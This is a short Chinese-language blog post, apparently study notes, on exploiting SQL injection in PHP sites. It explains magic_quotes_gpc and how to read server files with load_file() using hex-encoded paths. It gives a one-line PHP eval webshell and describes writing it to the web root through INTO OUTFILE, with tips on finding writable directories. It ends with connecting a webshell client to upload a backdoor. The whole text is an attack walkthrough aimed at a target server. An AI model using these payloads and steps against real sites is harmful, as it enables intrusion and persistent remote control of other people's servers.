标签:方法 目标 lan 执行 配置文件 post 引号 用户 linux
1.php.ini(php的配置文件)中的magic_quotes_gpc的作用:传递$_GET,$_POST,$_COOKIE请求时是否对单引号做处理(单引号前加反斜杠进行转译,如\’这样就无法执行带单引号的恶意请求),注入时如果目标开启,那么我们无法通过注入点写文件到服务器上(SQl语句不会成功执行)
2.POST型一句话木马,<?php eval($_POST[cmd)]:?>(eval()函数主要是执行php的版本)
3.如果magic_quotes_gpc是关闭的,可以直接在load_file()中用’’并将网站物理路径中的\改为/
例load_file(C:\A\B\C.php)改为load_file(‘C:/A/B/C.php’)。但如果magic_quotes_gpc是打开的话,就将网站物理路径转换成十六进制再直接放在load_file()中不用单引号。通过这种方法也可以知道网站的magic_quotes_gpc是否是打开的。
4读出配置文件后,可以把一句话木马写进服务器:在显示位上’<?php eval($_POST[cmd]);?>’+into outfile+’网站物理路径根目录+/加上新的表’。(如果服务器是linux的话,可能网站的根目录当前用户不可写权限不够,那么可能就得找一个上传的目录,其他用户一般都会有权限的,或者找其他的可以放图片的也是有可能的。)
5、用post型一句话木马的客户端(lanker一句话PHP后门客户端)把后门上传。
php.ini(php的配置文件)中的magic_quotes_gpc
标签:方法 目标 lan 执行 配置文件 post 引号 用户 linux
原文地址:http://www.cnblogs.com/continueFe/p/6920703.html
